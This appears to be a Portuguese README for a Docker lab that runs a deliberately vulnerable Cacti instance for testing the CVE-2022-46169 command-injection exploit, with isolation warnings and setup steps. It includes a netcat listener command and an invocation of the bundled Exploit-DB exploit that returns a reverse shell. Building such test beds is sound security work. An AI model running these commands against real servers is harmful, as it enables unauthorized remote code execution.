
AVISO: Esta é uma aplicação vulnerável para testar o exploit da injeção de comandos no Cacti (CVE-2022-46169). Execute por sua conta e risco!
Esta é uma aplicação vulnerável para testar o exploit da vulnerabilidade Cacti (CVE-2022-46169).
Esta aplicação contém sérias vulnerabilidades de segurança. Execute por sua conta e risco! Recomenda-se usar um ambiente isolado e com backup (como uma VM com snapshot recente e rede somente host). Não faça upload desta aplicação para servidores na Internet, pois eles serão comprometidos.
DISCLAIMER: Não me responsabilizo pela forma como qualquer pessoa utiliza esta aplicação. O único propósito desta aplicação é ser um cenário de teste para o exploit CVE-2022-46169 e não deve ser usado maliciosamente. Se o seu servidor for comprometido através de uma instalação desta aplicação, a responsabilidade não é minha, e sim da(s) pessoa(s) que fizeram o upload e instalaram.
Aqui estão os passos para configurar o ambiente:
docker compose up -d para iniciar a composição.admin/admin.O contêiner será chamado vuln-cacti.
Para desmontar o ambiente, use o comando docker compose down.
O guia oficial de instalação do Cacti pode ser encontrado aqui.
Uma descrição detalhada da causa raiz da vulnerabilidade está disponível aqui.
Um exploit público está disponível no Exploit-DB. Ele foi copiado para a pasta exploit/ por simplicidade.
Para executá-lo:
nc -lvp 6669
./exploit/exploit.py -u http://127.0.0.1/cacti/ -i host.docker.internal -p 6669
host.docker.internal é usado para alcançar a máquina host a partir do contêiner (referência).Há também uma entrada no repositório vulhub.
Este projeto está licenciado sob a Unlicense - veja o arquivo LICENSE para detalhes.